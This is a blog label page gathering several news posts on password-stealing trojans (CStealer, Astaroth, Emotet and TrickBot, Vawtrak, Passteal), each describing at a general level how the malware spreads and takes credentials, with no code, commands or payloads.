Search This Blog

Showing posts with label password stealing trojans. Show all posts

New Chrome Password Stealer, 'CStealer' Sends Stolen Data to a MongoDB Database


The information collected by the Chrome browser including passwords, usernames, and other user credentials is being exposed to heavy risk as a new trojan known as CStealer attempts to steal the confidential data stored onto Google's Chrome browser.

Password stealer trojans include applications that tend to run in the background and silently gather sensitive information about the system such as connected users and network activity. It attempts to steal confidential information stored onto the system and the browsers like usernames, passwords and other credentials which once being stolen are sent to a specified destination by the attacker.

While the idea behind this info-stealing trojan is just like many others- which is to steal user credentials saved onto the browser's password manager, however, the fact that CStealer uses a remote MongoDB database to store the stolen data is what makes this case unprecedented and interesting.

The malware which was discovered by MalwareHunterTeam and was later analyzed by James does not compile and send the stolen data to a C2 under the author's command, rather, it is programmed to directly connect to a remote MongoDB data and utilize it to keep the stolen passwords stored, according to the findings.

As soon as the passwords are successfully stolen, the malware tends to link to the database and store the stolen data as per the network traffic created which was examined by James. In order to carry this out, the malware carries hardcoded MongoDB credentials and to connect to the database, it uses the MongoDB C Driver as the client library.

Notably, the approach is a bit more sophisticated and not as mainstream, however, ultimately it gets the agenda right as it successfully gets the credentials stolen. In doing so, indirectly it also gives a free invitation to other hackers to access the victim's confidential information as it tends to decrypt the privacy layers already. To exemplify, anyone who would examine the malware afterward, from law enforcers to security officers, will be able to retrieve the hardcoded passwords and employ them to get to the stolen data.

Astaroth- The Tojan That Abuses Anti-Virus Software To Steal Data




A new Trojan has surfaced which disguises itself as GIF and image files and tries to exploit the anti-virus software to harvest the data on the user’s PC.

A security research team brought the situation to everyone’s notice that this variant supposedly makes use of the modules in the cyber-security software.

The exploitation of the modules leads to the cyber-con getting hold of the victim’s data including online credentials

The Trojan in the guise of an extension-less files tries to move around the victim’s PC undetected.

By the use of spam emails and phishing messages, the victim’s lured into downloading the malicious file and then the actual Microsoft Windows BITSAdmin tool is used to download the full payload from a command-and-control (C2) server.

The malware then launches an XSL script and finalizes a channel with the C2 server. The script is obfuscated and contains functions to shroud itself from the anti-virus software.

The same script is responsible for the process which influences BITSAdmin to download payloads which include Astaroth from a different C2 server.

The old version of this Trojan used to launch a scan to look for the anti-virus programs, and in case of the presence of “Avast”, the malware used to quit.



But as it turns out with Astaroth, the antivirus software would now be abused and a malicious module would be injected into one of its processes.

The exploitation of these systems is called LOL bins, Living Off the Land binaries. GAS, an anti-fraud security program could be abused in the same way.

This Trojan first surfaced in the year 2017 in South America. It targets machines, passwords and other data. Astaroth is also capable of Keylog and could intercept calls and terminate processes.

The malware employs a “ fromCharCode() deobfuscation ” method to conceal code execution, which is an upgrade on older versions of Astaroth.

LOLbins seem to have a lot of malicious potential including stealing credentials and personal data. This method is highly attractive to cyber-cons and hence needs to be prepared against.

The Return Of Trojan Poses Substantial Hacking Threat To Businesses!




The Trojan malware has returned with its infectious ransomware attacks with an aim to harvest banking credentials and personal and property related data.




Business organizations have come out to become the latest targets of this malware.



With long-term and insidious operations as ambition, the Trojan poses a lot of threat even to intellectual property.



In one of the new reports of one of the reputed security companies, it was mentioned that backdoor attacks against businesses with Trojans as back power have subsequently increased.



According to the aforementioned security lab, “Trojans” and “Backdoors” are different.



A Trojan is supposed to perform one function but ends up performing another and a Backdoor is a type of Trojan which enables a threat actor to access a system via bypassing security.



“Spyware” attacks have also consequentially risen. A spyware is a malware which aids gaining information on a device and sending it to a third party, stealthily.



This concept, of a spyware, sure is old but still is as efficacious as any other powerful malware and strictly works towards data exfiltration.



The “Emotet Trojan” has been considered to be behind the information stealing campaigns all round last year and in the beginning of this moth too.



This Trojan could move through networks, harvest data, and monitor networks. Also, it could easily infect systems by reproducing with no substantial effort at all.



Emotet is a self-sufficient danger which tends to spread onto compromised systems in addition to installing other malware on them.

The menacing behavior of TrickBot was also inferred upon by the aforementioned report, as it’s one of the by-products of Emotet.



The constantly evolving TrickBot daily gets updated with new abilities, stealing passwords and browser histories and harvesting sensitive data being a few of them.



Consultancy firms seem to be the primary targets of the Trojan. It is disposed towards harvesting more than just banking details and personal information.



Intellectual property is another thing which is a major point of concern for everyone now that the cyber-cons have stooped down to breaching walls using Trojans.



These tactics were thought to be really boring and old but have taken serious tosses and turns and have evolved into something genuinely perilous.



Businesses should stop under-estimating the attacks and keep a keen eye towards any potentiality of such attacks.

Banking Trojan Vawtrak

Banking Trojan Vawtrak (aka Neverquest or Snifula) which additionally uses the Pony module to steal wide range of log-in credentials has been proliferating rapidly over the last few months

 USA, Germany, UK, Czech Republic are the  top  affected countries this year.

While Trojans like this are not new, what makes it remarkable is the  the multi-layered concealing processes and wide range of functions it can execute.

The Vawtrak Trojkan spreads via drive-by download – in the form of spam email attachments or links to compromised sites or  through malware downloaders such as Zemot or Chaintor or through exploit kits like Angler.

Tracking the Trojan  Vawtrak, AVG has revealed a detailed analysis of its installation and functionality.

Installation
The trojan was delivered through a spam email from Amazon which contained link to a zip archive stored on a compromised Wordpress site. The delivered file which actually was a executable tried to simultaneously look as  a pdf and a screen saver. It then installed itself into the system and ensured persistence by enabling auto-execution  Windows start-up. Without causing visible changes in the system, it then dropped the DLL into the program folder and deleted its original version.

This shorter second DLL decrypts its payload, which looks like  a normal Windows exe file but is a compressed file. The decompressed file replaces the second DLL and extracts the final module in a compressed format which further contains another two DLL files. The appropriate DLL then executes Vawtrak's main functionality.

Functionality
Once executed, Vawtrak disables antivirus protection of almost all known anti-viruses, steals multiple passwords from browsers (even obscure browsers such as K-Meleon or Flock) or applications, steals browser history, modifies browser settings, logs keystrokes, takes screenshots or records user actions on desktop, enables remote access to victim's system.

Further it communicates with remote Control & Command servers, executing commands from a remote server, sending stolen information, downloading new versions of itself and web-injection frameworks.
One fascinating feature is that it can connect to the update servers  hosted on the Tor hidden Web services via a Tor2web proxy without installing any special software such as Tor browser. Moreover, the communication with the remote server is done over SSL, which adds further encryption. Due to the use of steganography, the user remains totally ignorant of the working and updation of the Trojan.

Vawtrak is not as advanced as some others but its actions are too aggressive and they may cause stability or performance issues in the infected machines.

Staying vigilant about online phishing and scams is the most efficient way of avoiding Vawtrak but as it may still find its way, even without a user's direct interaction. So having an efficient and updated antivirus solution is of utmost importance.

For full analysis of the Trojan, read the complete report by AVG.

Passteal : password-stealing malware disguised as keygen and ebooks

Password stealing malwares

Passteal, the malware that steals passwords stored in the browser using a password recovery tools, disguised as Key generators and Ebooks.

This indicates that the malware targets users who frequently use Torrent and other file hosting website to get hold of illegal copies of software.

While older variants use the password recovery tool "PasswordFox", the new variant uses 'WebBrowserPassView' tool to steal credentials stored in major browser apps such as Internet Explorer ver. 4.0-8.0, Mozilla Firefox 1.x-4.x, Google Chrome, and Apple Safari.

Once the malware extracts the data, it stores the stolen credentials in an .XML file and send the file to a remote FTP server.

According to TrendMicro malware report, the password recovery tool enables PASSTEAL to acquire all login credentials stored in the browser- even from websites using secured connections (SSL or HTTPS).